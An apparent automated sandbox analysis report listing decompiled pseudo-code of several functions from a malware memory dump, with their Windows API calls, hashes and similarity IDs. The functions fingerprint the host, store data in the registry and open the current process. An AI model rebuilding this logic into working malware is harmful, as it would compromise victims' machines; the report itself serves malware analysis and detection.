                                                          • Opcode Fuzzy Hash: dc5f30ae1297a4ec7e8df64686465041612b7554106c3bdc7b0786697b1c5fdc
                                                          • Instruction Fuzzy Hash: 80513D75D0055AEFCB05DFA8C88C9AEBBBAFF88704B144598E955EB220D7319D41CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 87%
                                                          			E005E11EE(signed int _a4, signed int* _a8) {
                                                          				void* __ecx;
                                                          				void* __edi;
                                                          				signed int _t6;
                                                          				intOrPtr _t8;
                                                          				intOrPtr _t12;
                                                          				short* _t19;
                                                          				void* _t25;
                                                          				signed int* _t28;
                                                          				CHAR* _t30;
                                                          				long _t31;
                                                          				intOrPtr* _t32;
                                                          
                                                          				_t6 =  *0x5ed270; // 0xd448b889
                                                          				_t1 =  &_a4; // 0x5e3760
                                                          				_t32 =  *_t1;
                                                          				_a4 = _t6 ^ 0x109a6410;
                                                          				_t8 =  *0x5ed2a8; // 0x107a5a8
                                                          				_t3 = _t8 + 0x5ee87e; // 0x61636f4c
                                                          				_t25 = 0;
                                                          				_t30 = E005E38A8(_t3, 1);
                                                          				if(_t30 != 0) {
                                                          					_t25 = CreateEventA(0x5ed2ac, 1, 0, _t30);
                                                          					E005EA734(_t30);
                                                          				}
                                                          				_t12 =  *0x5ed25c; // 0x2000000a
                                                          				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E005EA65C() != 0) {
                                                          					L12:
                                                          					_t28 = _a8;
                                                          					if(_t28 != 0) {
                                                          						 *_t28 =  *_t28 | 0x00000001;
                                                          					}
                                                          					_t31 = E005E8EA1(_t32, 0);
                                                          					if(_t31 == 0 && _t25 != 0) {
                                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                          					}
                                                          					if(_t28 != 0 && _t31 != 0) {
                                                          						 *_t28 =  *_t28 & 0xfffffffe;
                                                          					}
                                                          					goto L20;
                                                          				} else {
                                                          					_t19 =  *0x5ed10c( *_t32, 0x20);
                                                          					if(_t19 != 0) {
                                                          						 *_t19 = 0;
                                                          						_t19 = _t19 + 2;
                                                          					}
                                                          					_t31 = E005EA273(0,  *_t32, _t19, 0);
                                                          					if(_t31 == 0) {
                                                          						if(_t25 == 0) {
                                                          							L22:
                                                          							return _t31;
                                                          						}
                                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                          						if(_t31 == 0) {
                                                          							L20:
                                                          							if(_t25 != 0) {
                                                          								CloseHandle(_t25);
                                                          							}
                                                          							goto L22;
                                                          						}
                                                          					}
                                                          					goto L12;
                                                          				}
                                                          			}















                                                          APIs
                                                            • Part of subcall function 005E38A8: lstrlen.KERNEL32(00000005,00000000,63699BC3,00000027,00000000,01669A98,00000000,?,?,63699BC3,00000005,005ED00C,?,?,005E5D30), ref: 005E38DE
                                                            • Part of subcall function 005E38A8: lstrcpy.KERNEL32(00000000,00000000), ref: 005E3902
                                                            • Part of subcall function 005E38A8: lstrcat.KERNEL32(00000000,00000000), ref: 005E390A
                                                          • CreateEventA.KERNEL32(005ED2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,005E3760,?,00000001,?), ref: 005E122F
                                                            • Part of subcall function 005EA734: HeapFree.KERNEL32(00000000,00000000,005E5637,00000000,?,?,00000000), ref: 005EA740
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,`7^,00000000,00000000,?,00000000,?,005E3760,?,00000001,?,?,?,?,005E52AA), ref: 005E128F
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,005E3760,?,00000001,?), ref: 005E12BD
                                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,005E3760,?,00000001,?,?,?,?,005E52AA), ref: 005E12D5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                          • String ID: `7^
                                                          • API String ID: 73268831-2873282293
                                                          • Opcode ID: 3fd489991be8baeff6ba15d8e856e1ef83633cbdbc4b2b78c7d6b49a5e2f86d7
                                                          • Instruction ID: e222dcbcdb25154274b5d86426d1701951fa2edd8bb3171f63efaa6a9e9f0160
                                                          • Opcode Fuzzy Hash: 3fd489991be8baeff6ba15d8e856e1ef83633cbdbc4b2b78c7d6b49a5e2f86d7
                                                          • Instruction Fuzzy Hash: 7A214836A00BC15BC7395B7B8C88A6F7FA9FB95750B050614FBD6DB150DB31CC058698
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 53%
                                                          			E005E486F(char* __eax) {
                                                          				char* _t8;
                                                          				intOrPtr _t12;
                                                          				char* _t21;
                                                          				signed int _t23;
                                                          				char* _t24;
                                                          				signed int _t26;
                                                          				void* _t27;
                                                          
                                                          				_t21 = __eax;
                                                          				_push(0x20);
                                                          				_t23 = 1;
                                                          				_push(__eax);
                                                          				while(1) {
                                                          					_t8 = StrChrA();
                                                          					if(_t8 == 0) {
                                                          						break;
                                                          					}
                                                          					_t23 = _t23 + 1;
                                                          					_push(0x20);
                                                          					_push( &(_t8[1]));
                                                          				}
                                                          				_t12 = E005EA71F(_t23 << 2);
                                                          				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                                          				if(_t12 != 0) {
                                                          					StrTrimA(_t21, 0x5ec284);
                                                          					_t26 = 0;
                                                          					do {
                                                          						_t24 = StrChrA(_t21, 0x20);
                                                          						if(_t24 != 0) {
                                                          							 *_t24 = 0;
                                                          							_t24 =  &(_t24[1]);
                                                          							StrTrimA(_t24, 0x5ec284);
                                                          						}
                                                          						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
                                                          						_t26 = _t26 + 1;
                                                          						_t21 = _t24;
                                                          					} while (_t24 != 0);
                                                          					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
                                                          				}
                                                          				return 0;
                                                          			}











                                                          APIs
                                                          • StrChrA.SHLWAPI(?,00000020,00000000,016695AC,?,%]^,?,005E243F,016695AC,?,005E5D25), ref: 005E4889
                                                          • StrTrimA.SHLWAPI(?,005EC284,00000002,?,%]^,?,005E243F,016695AC,?,005E5D25), ref: 005E48A8
                                                          • StrChrA.SHLWAPI(?,00000020,?,%]^,?,005E243F,016695AC,?,005E5D25), ref: 005E48B3
                                                          • StrTrimA.SHLWAPI(00000001,005EC284,?,%]^,?,005E243F,016695AC,?,005E5D25), ref: 005E48C5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Trim
                                                          • String ID: %]^
                                                          • API String ID: 3043112668-1107362547
                                                          • Opcode ID: 294f46572ccb704719e489c4c89e541e4821f675316c2e9def491d70bb296f95
                                                          • Instruction ID: 4fa4c1ee066485c5a76f7fdcd02e2ff6569d7a6f96af1af0ec3a753583fdf0ea
                                                          • Opcode Fuzzy Hash: 294f46572ccb704719e489c4c89e541e4821f675316c2e9def491d70bb296f95
                                                          • Instruction Fuzzy Hash: 5A01B576A093D19BD2299F678C48E27BFA8FB95B50F110559F9C2C7240DB60C802DAB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E005EA199() {
                                                          				long _v8;
                                                          				long _v12;
                                                          				int _v16;
                                                          				long _t39;
                                                          				long _t43;
                                                          				signed int _t47;
                                                          				short _t51;
                                                          				signed int _t52;
                                                          				int _t56;
                                                          				int _t57;
                                                          				char* _t64;
                                                          				short* _t67;
                                                          
                                                          				_v16 = 0;
                                                          				_v8 = 0;
                                                          				GetUserNameW(0,  &_v8);
                                                          				_t39 = _v8;
                                                          				if(_t39 != 0) {
                                                          					_v12 = _t39;
                                                          					_v8 = 0;
                                                          					GetComputerNameW(0,  &_v8);
                                                          					_t43 = _v8;
                                                          					if(_t43 != 0) {
                                                          						_v12 = _v12 + _t43 + 2;
                                                          						_t64 = E005EA71F(_v12 + _t43 + 2 << 2);
                                                          						if(_t64 != 0) {
                                                          							_t47 = _v12;
                                                          							_t67 = _t64 + _t47 * 2;
                                                          							_v8 = _t47;
                                                          							if(GetUserNameW(_t67,  &_v8) == 0) {
                                                          								L7:
                                                          								E005EA734(_t64);
                                                          							} else {
                                                          								_t51 = 0x40;
                                                          								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                                          								_t52 = _v8;
                                                          								_v12 = _v12 - _t52;
                                                          								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                                          									goto L7;
                                                          								} else {
                                                          									_t56 = _v12 + _v8;
                                                          									_t31 = _t56 + 2; // 0x5e1fd4
                                                          									_v12 = _t56;
                                                          									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                                          									_v8 = _t57;
                                                          									if(_t57 == 0) {
                                                          										goto L7;
                                                          									} else {
                                                          										_t64[_t57] = 0;
                                                          										_v16 = _t64;
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return _v16;
                                                          			}
















                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,005E1FD2), ref: 005EA1AD
                                                          • GetComputerNameW.KERNEL32(00000000,005E1FD2), ref: 005EA1C9
                                                            • Part of subcall function 005EA71F: RtlAllocateHeap.NTDLL(00000000,00000000,005E5595), ref: 005EA72B
                                                          • GetUserNameW.ADVAPI32(00000000,005E1FD2), ref: 005EA203
                                                          • GetComputerNameW.KERNEL32(005E1FD2,?), ref: 005EA226
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,005E1FD2,00000000,005E1FD4,00000000,00000000,?,?,005E1FD2), ref: 005EA249
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                          • String ID:
                                                          • API String ID: 3850880919-0
                                                          • Opcode ID: 2d78962d37dfcbf2b4666c458600becc64a07a6211e666da89ed5d534bd6167e
                                                          • Instruction ID: 44354c89d732029c000b26dfc0d2817f33c2ce87cfad39c2f3426294ac311dab
                                                          • Opcode Fuzzy Hash: 2d78962d37dfcbf2b4666c458600becc64a07a6211e666da89ed5d534bd6167e
                                                          • Instruction Fuzzy Hash: BE21F976901248FFCB15DFE5C988CEEBBB9FF84304B1044AAE641E7240E630AB45DB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 58%
                                                          			E005E3DE9(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                          				void* __esi;
                                                          				long _t10;
                                                          				void* _t18;
                                                          				void* _t22;
                                                          
                                                          				_t9 = __eax;
                                                          				_t22 = __eax;
                                                          				if(_a4 != 0 && E005E5AF1(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                                          					L9:
                                                          					return GetLastError();
                                                          				}
                                                          				_t10 = E005EA81C(_t9, _t18, _t22, _a8);
                                                          				if(_t10 == 0) {
                                                          					ResetEvent( *(_t22 + 0x1c));
                                                          					ResetEvent( *(_t22 + 0x20));
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0xffffffff);
                                                          					_push(0);
                                                          					_push( *((intOrPtr*)(_t22 + 0x18)));
                                                          					if( *0x5ed128() != 0) {
                                                          						SetEvent( *(_t22 + 0x1c));
                                                          						goto L7;
                                                          					} else {
                                                          						_t10 = GetLastError();
                                                          						if(_t10 == 0x3e5) {
                                                          							L7:
                                                          							_t10 = 0;
                                                          						}
                                                          					}
                                                          				}
                                                          				if(_t10 == 0xffffffff) {
                                                          					goto L9;
                                                          				}
                                                          				return _t10;
                                                          			}








                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,005E67B8,?,?,00000000,00000000), ref: 005E3E23
                                                          • ResetEvent.KERNEL32(?), ref: 005E3E28
                                                          • GetLastError.KERNEL32 ref: 005E3E40
                                                          • GetLastError.KERNEL32(?,?,00000102,005E67B8,?,?,00000000,00000000), ref: 005E3E5B
                                                            • Part of subcall function 005E5AF1: lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,005E3E08,?,?,?,?,00000102,005E67B8,?,?,00000000), ref: 005E5AFD
                                                            • Part of subcall function 005E5AF1: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,005E3E08,?,?,?,?,00000102,005E67B8,?), ref: 005E5B5B
                                                            • Part of subcall function 005E5AF1: lstrcpy.KERNEL32(00000000,00000000), ref: 005E5B6B
                                                          • SetEvent.KERNEL32(?), ref: 005E3E4E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1449191863-0
                                                          • Opcode ID: 1050e8ca13502b11d51259ac7780605de05287370376f5dd37f785e83d3fc3f7
                                                          • Instruction ID: 2c70de9930c8c0051d1e3cdccbf7188e87ee558b9311db358e099c215467838f
                                                          • Opcode Fuzzy Hash: 1050e8ca13502b11d51259ac7780605de05287370376f5dd37f785e83d3fc3f7
                                                          • Instruction Fuzzy Hash: 3901A231104381ABD7386B72DC8CF1BBFA8BF54764F110A24F5D1D60E0D720D909EA61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E005E3E69(intOrPtr _a4) {
                                                          				void* _t2;
                                                          				unsigned int _t4;
                                                          				void* _t5;
                                                          				long _t6;
                                                          				void* _t7;
                                                          				void* _t15;
                                                          
                                                          				_t2 = CreateEventA(0, 1, 0, 0);
                                                          				 *0x5ed26c = _t2;
                                                          				if(_t2 == 0) {
                                                          					return GetLastError();
                                                          				}
                                                          				_t4 = GetVersion();
                                                          				if(_t4 != 5) {
                                                          					L4:
                                                          					if(_t15 <= 0) {
                                                          						_t5 = 0x32;
                                                          						return _t5;
                                                          					}
                                                          					L5:
                                                          					 *0x5ed25c = _t4;
                                                          					_t6 = GetCurrentProcessId();
                                                          					 *0x5ed258 = _t6;
                                                          					 *0x5ed264 = _a4;
                                                          					_t7 = OpenProcess(0x10047a, 0, _t6);
                                                          					 *0x5ed254 = _t7;
                                                          					if(_t7 == 0) {
                                                          						 *0x5ed254 =  *0x5ed254 | 0xffffffff;
                                                          					}
                                                          					return 0;
                                                          				}
                                                          				if(_t4 >> 8 > 0) {
                                                          					goto L5;
                                                          				}
                                                          				_t15 = _t4 - _t4;
                                                          				goto L4;
                                                          			}










                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,005E131F,?,?,00000001,?,?,?,005E4EF2,?), ref: 005E3E71
                                                          • GetVersion.KERNEL32(?,00000001,?,?,?,005E4EF2,?), ref: 005E3E80
                                                          • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,005E4EF2,?), ref: 005E3E9C
                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,005E4EF2,?), ref: 005E3EB9
                                                          • GetLastError.KERNEL32(?,00000001,?,?,?,005E4EF2,?), ref: 005E3ED8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                          • String ID:
                                                          • API String ID: 2270775618-0
                                                          • Opcode ID: b30b99bbf44ee614e4129c72ae15a6688877db2bbabfb3406beb42c041576b74
                                                          • Instruction ID: 6e4847ef290cbe9cb20d7358dfb175e18c3f4d323c94b3f4f38a69d519505787
                                                          • Opcode Fuzzy Hash: b30b99bbf44ee614e4129c72ae15a6688877db2bbabfb3406beb42c041576b74
                                                          • Instruction Fuzzy Hash: BEF06DB4A403C19BD72C8B35AC8DB193F66B7A0741F100415E6D2CF2E0D771C50AEB25
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 88%
                                                          			E005E853F(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                          				signed int _v8;
                                                          				char _v12;
                                                          				signed int* _v16;
                                                          				char _v284;
                                                          				void* __esi;
                                                          				char* _t59;
                                                          				intOrPtr* _t60;
                                                          				intOrPtr _t64;
                                                          				char _t65;
                                                          				intOrPtr _t68;
                                                          				intOrPtr _t69;
                                                          				intOrPtr _t71;
                                                          				void* _t73;
                                                          				signed int _t81;
                                                          				void* _t91;
                                                          				void* _t92;
                                                          				char _t98;
                                                          				signed int* _t100;
                                                          				intOrPtr* _t101;
                                                          				void* _t102;
                                                          
                                                          				_t92 = __ecx;
                                                          				_v8 = _v8 & 0x00000000;
                                                          				_t98 = _a16;
                                                          				if(_t98 == 0) {
                                                          					__imp__( &_v284,  *0x5ed33c);
                                                          					_t91 = 0x80000002;
                                                          					L6:
                                                          					_t59 = E005E9070( &_v284,  &_v284);
                                                          					_a8 = _t59;
                                                          					if(_t59 == 0) {
                                                          						_v8 = 8;
                                                          						L29:
                                                          						_t60 = _a20;
                                                          						if(_t60 != 0) {
                                                          							 *_t60 =  *_t60 + 1;
                                                          						}
                                                          						return _v8;
                                                          					}
                                                          					_t101 = _a24;
                                                          					if(E005E6E98(_t92, _t97, _t101, _t91, _t59) != 0) {
                                                          						L27:
                                                          						E005EA734(_a8);
                                                          						goto L29;
                                                          					}
                                                          					_t64 =  *0x5ed278; // 0x1669a98
                                                          					_t16 = _t64 + 0xc; // 0x1669b66
                                                          					_t65 = E005E9070(_t64,  *_t16);
                                                          					_a24 = _t65;
                                                          					if(_t65 == 0) {
                                                          						L14:
                                                          						_t29 = _t101 + 0x14; // 0x102
                                                          						_t33 = _t101 + 0x10; // 0x3d005ec0
                                                          						if(E005E22F1(_t97,  *_t33, _t91, _a8,  *0x5ed334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                                                          							_t68 =  *0x5ed2a8; // 0x107a5a8
                                                          							if(_t98 == 0) {
                                                          								_t35 = _t68 + 0x5eea3f; // 0x4d4c4b48
                                                          								_t69 = _t35;
                                                          							} else {
                                                          								_t34 = _t68 + 0x5ee8e7; // 0x55434b48
                                                          								_t69 = _t34;
                                                          							}
                                                          							if(E005E6C38(_t69,  *0x5ed334,  *0x5ed338,  &_a24,  &_a16) == 0) {
                                                          								if(_t98 == 0) {
                                                          									_t71 =  *0x5ed2a8; // 0x107a5a8
                                                          									_t44 = _t71 + 0x5ee846; // 0x74666f53
                                                          									_t73 = E005E9070(_t44, _t44);
                                                          									_t99 = _t73;
                                                          									if(_t73 == 0) {
                                                          										_v8 = 8;
                                                          									} else {
                                                          										_t47 = _t101 + 0x10; // 0x3d005ec0
                                                          										E005E5D7D( *_t47, _t91, _a8,  *0x5ed338, _a24);
                                                          										_t49 = _t101 + 0x10; // 0x3d005ec0
                                                          										E005E5D7D( *_t49, _t91, _t99,  *0x5ed330, _a16);
                                                          										E005EA734(_t99);
                                                          									}
                                                          								} else {
                                                          									_t40 = _t101 + 0x10; // 0x3d005ec0
                                                          									E005E5D7D( *_t40, _t91, _a8,  *0x5ed338, _a24);
                                                          									_t43 = _t101 + 0x10; // 0x3d005ec0
                                                          									E005E5D7D( *_t43, _t91, _a8,  *0x5ed330, _a16);
                                                          								}
                                                          								if( *_t101 != 0) {
                                                          									E005EA734(_a24);
                                                          								} else {
                                                          									 *_t101 = _a16;
                                                          								}
                                                          							}
                                                          						}
                                                          						goto L27;
                                                          					}
                                                          					_t21 = _t101 + 0x10; // 0x3d005ec0
                                                          					_t81 = E005E8BC1( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                                                          					if(_t81 == 0) {
                                                          						_t100 = _v16;
                                                          						if(_v12 == 0x28) {
                                                          							 *_t100 =  *_t100 & _t81;
                                                          							_t26 = _t101 + 0x10; // 0x3d005ec0
                                                          							E005E22F1(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                                          						}
                                                          						E005EA734(_t100);
                                                          						_t98 = _a16;
                                                          					}
                                                          					E005EA734(_a24);
                                                          					goto L14;
                                                          				}
                                                          				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                          					goto L29;
                                                          				} else {
                                                          					_t97 = _a8;
                                                          					E005EA749(_t98, _a8,  &_v284);
                                                          					__imp__(_t102 + _t98 - 0x117,  *0x5ed33c);
                                                          					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                                          					_t91 = 0x80000003;
                                                          					goto L6;
                                                          				}
                                                          			}

                                                          APIs
                                                          • StrChrA.SHLWAPI(?,0000005F,00000000,00000000,00000104), ref: 005E8572
                                                          • lstrcpy.KERNEL32(?,?), ref: 005E859F
                                                            • Part of subcall function 005E9070: lstrlen.KERNEL32(?,00000000,01669A98,00000000,005E8808,01669C76,?,?,?,?,?,63699BC3,00000005,005ED00C), ref: 005E9077
                                                            • Part of subcall function 005E9070: mbstowcs.NTDLL ref: 005E90A0
                                                            • Part of subcall function 005E9070: memset.NTDLL ref: 005E90B2
                                                            • Part of subcall function 005E5D7D: lstrlenW.KERNEL32(?,?,?,005E8708,3D005EC0,80000002,?,005EA513,74666F53,4D4C4B48,005EA513,?,3D005EC0,80000002,?,?), ref: 005E5DA2
                                                            • Part of subcall function 005EA734: HeapFree.KERNEL32(00000000,00000000,005E5637,00000000,?,?,00000000), ref: 005EA740
                                                          • lstrcpy.KERNEL32(?,00000000), ref: 005E85C1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                          • String ID: A7^
                                                          • API String ID: 3924217599-2462966306
                                                          • Opcode ID: 399570754ce1dc97e590bf1976e64df3d6a3ecc291d785cd1eb52af23b0e93f6
                                                          • Instruction ID: 820a16797a4b830656163e1383d410b4552854c50aacfe605305f0e911ec927d
                                                          • Opcode Fuzzy Hash: 399570754ce1dc97e590bf1976e64df3d6a3ecc291d785cd1eb52af23b0e93f6
                                                          • Instruction Fuzzy Hash: 28519F7600028AEFCF19AF62DD88EAA3FB9FF58340F104514F9955A120DB32DD19EB21
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 90%
                                                          			E005E1C66(void* __eflags, int _a4) {
                                                          				intOrPtr _v12;
                                                          				char _v16;
                                                          				WCHAR* _v20;
                                                          				char* _v24;
                                                          				int _v28;
                                                          				void* _v40;
                                                          				char _v44;
                                                          				char _v72;
                                                          				char _v76;
                                                          				char _v80;
                                                          				char _v84;
                                                          				void _v88;
                                                          				char _v92;
                                                          				void* __esi;
                                                          				intOrPtr _t42;
                                                          				intOrPtr _t44;
                                                          				intOrPtr _t53;
                                                          				void* _t76;
                                                          				WCHAR* _t80;
                                                          				intOrPtr _t82;
                                                          
                                                          				_v92 = 0;
                                                          				memset( &_v88, 0, 0x2c);
                                                          				_v44 = 0;
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_t42 =  *0x5ed278; // 0x1669a98
                                                          				_t5 = _t42 + 0x48; // 0x1669c1d
                                                          				_t82 =  *_t5;
                                                          				_t6 = _t42 + 0x4c; // 0x1669c29
                                                          				_v16 =  *_t6;
                                                          				_t44 =  *0x5ed2a8; // 0x107a5a8
                                                          				_t8 = _t44 + 0x5eee20; // 0x410025
                                                          				_t80 = E005E468E(_t8);
                                                          				_v20 = _t80;
                                                          				if(_t80 == 0) {
                                                          					_t76 = 8;
                                                          					L24:
                                                          					return _t76;
                                                          				}
                                                          				if(StrCmpNIW(_t80, _a4, lstrlenW(_t80)) != 0) {
                                                          					_t76 = 1;
                                                          					L22:
                                                          					E005EA734(_v20);
                                                          					goto L24;
                                                          				}
                                                          				if(E005EA2F9(0,  &_a4) != 0) {
                                                          					_a4 = 0;
                                                          				}
                                                          				_t53 = E005E9070(_t52,  *0x5ed33c);
                                                          				_v12 = _t53;
                                                          				if(_t53 == 0) {
                                                          					_t76 = 8;
                                                          					goto L19;
                                                          				} else {
                                                          					_t84 = E005E9070(_t53, _t82);
                                                          					if(_t55 == 0) {
                                                          						_t76 = 8;
                                                          					} else {
                                                          						_t76 = E005E8BC1(_a4, 0x80000001, _v12, _t84,  &_v92,  &_v88);
                                                          						_t55 = E005EA734(_t84);
                                                          					}
                                                          					if(_t76 != 0) {
                                                          						L17:
                                                          						E005EA734(_v12);
                                                          						L19:
                                                          						_t83 = _a4;
                                                          						if(_a4 != 0) {
                                                          							E005E4F14(_t83);
                                                          						}
                                                          						goto L22;
                                                          					} else {
                                                          						if(( *0x5ed260 & 0x00000001) == 0) {
                                                          							L14:
                                                          							E005E1709(_v88, _v92,  *0x5ed270, 0);
                                                          							_t76 = E005E6D8A(_v92,  &_v84,  &_v80, 0);
                                                          							if(_t76 == 0) {
                                                          								_v28 = _a4;
                                                          								_v24 =  &_v92;
                                                          								_t76 = E005E11EE( &_v44, 0);
                                                          							}
                                                          							E005EA734(_v92);
                                                          							goto L17;
                                                          						}
                                                          						_t20 =  &_v16; // 0x5e5d4f
                                                          						_t86 = E005E9070(_t55,  *_t20);
                                                          						if(_t67 == 0) {
                                                          							_t76 = 8;
                                                          						} else {
                                                          							_t76 = E005E8BC1(_a4, 0x80000001, _v12, _t86,  &_v76,  &_v72);
                                                          							E005EA734(_t86);
                                                          						}
                                                          						if(_t76 != 0) {
                                                          							goto L17;
                                                          						} else {
                                                          							goto L14;
                                                          						}
                                                          					}
                                                          				}
                                                          			}

                                                          APIs
                                                          • memset.NTDLL ref: 005E1C7B
                                                            • Part of subcall function 005E468E: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,01669C1D,00000000,005E1CAF,00410025,00000005,?,00000000), ref: 005E469F
                                                            • Part of subcall function 005E468E: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 005E46BC
                                                          • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 005E1CBD
                                                          • StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 005E1CC8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: EnvironmentExpandStrings$lstrlenmemset
                                                          • String ID: O]^
                                                          • API String ID: 3817122888-121719813
                                                          • Opcode ID: bad8cc340b0aefefa074feaa9446bfdcb1384b51bfdc21faecfd29b609c808a1
                                                          • Instruction ID: a78d68e952d0e5798b29582368ba1c9780207f1c5c7a553e7b0bb994bc8bf272
                                                          • Opcode Fuzzy Hash: bad8cc340b0aefefa074feaa9446bfdcb1384b51bfdc21faecfd29b609c808a1
